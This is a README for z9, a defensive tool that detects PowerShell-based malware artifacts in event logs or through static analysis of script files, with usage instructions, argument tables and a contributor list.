This tools detects the artifact of the PowerShell based malware from the eventlog of PowerShell logging.
Online Demo
git clone https://github.com/Sh1n0g1/z9
usage: z9.py [-h] [--output OUTPUT] [-s] [--no-viewer] [--utf8] input
positional arguments:
  input                 Input file path
options:
  -h, --help            show this help message and exit
  --output OUTPUT, -o OUTPUT
                        Output file path
  -s, --static          Enable Static Analysis mode
  --no-viewer           Disable opening the JSON viewer in a web browser
  --utf8                Read scriptfile in utf-8 (deprecated)
python z9.py <input file> -o <output json>
python z9.py <input file> -o <output json> --no-viewer
| Arguments | Meaning | 
|---|---|
| input file | XML file exported from eventlog | 
| -o output json | filename of z9 result | 
| --no-viewer  | do not open the viewer | 
Example)
python z9.py util\log\mwpsop.xml -o sample1.json
python z9.py <input file> -o <output json> -s
python z9.py <input file> -o <output json> -s --utf8
python z9.py <input file> -o <output json> -s --no-viewer
| Arguments | Meaning | 
|---|---|
| input file | PowerShell file to be analyzed | 
| -o output json | filename of z9 result | 
| -s | perform static analysis | 
| --utf8 | specify when the input file is in UTF-8 | 
| --no-viewer  | do not open the viewer | 
Example)
python z9.py malware.ps1 -o sample1.json -s
util/enable_powershell_logging.reg .util/collect_psevent.bat .util/log directory.util/collect_psevent.bat with "Run as Admin"hanataro-miz
si-tm
take32457
Bigdrea6
azaberrypi
Sh1n0g1